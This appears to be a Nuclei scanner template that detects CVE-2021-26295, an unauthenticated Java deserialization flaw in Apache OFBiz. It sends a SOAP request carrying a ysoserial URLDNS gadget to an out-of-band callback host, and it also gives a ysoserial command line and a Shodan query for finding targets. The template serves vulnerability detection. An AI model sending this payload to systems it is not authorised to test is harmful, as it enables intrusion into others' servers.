id: CVE-2021-26295

info:
  name: Apache OFBiz <17.12.06 - Arbitrary Code Execution
  author: madrobot
  severity: critical
  description: |
    Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Apache OFBiz to version 17.12.06 or later to mitigate this vulnerability.
  reference:
    - https://github.com/yumusb/CVE-2021-26295-POC
    - https://packetstormsecurity.com/files/162104/Apache-OFBiz-SOAP-Java-Deserialization.html
    - https://github.com/zhzyker/exphub/tree/master/ofbiz
    - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26295
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-26295
    cwe-id: CWE-502
    epss-score: 0.97455
    epss-percentile: 0.99952
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query: "OFBiz.Visitor="
    ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex
  tags: packetstorm,cve,cve2021,apache,ofbiz,deserialization,rce

http:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version='1.0' encoding='UTF-8'?>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header/>
          <soapenv:Body>
            <ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/">
              <ns1:cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</ns1:cus-obj>
            </ns1:clearAllEntityCaches>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "errorMessage"
        condition: and

      - type: word
        part: header
        words:
          - "OFBiz.Visitor="
# digest: 4a0a0047304502207fceb6c1afd6b61eea8fc64a6f46f583277f2c792ca6c37d0a2a03a34909d67c0221008d49815caf6057b3e04cf2a4e817adb8bcef6f220427227c65c73e825dc390bc:922c64590222798bb761d5b6d8e72950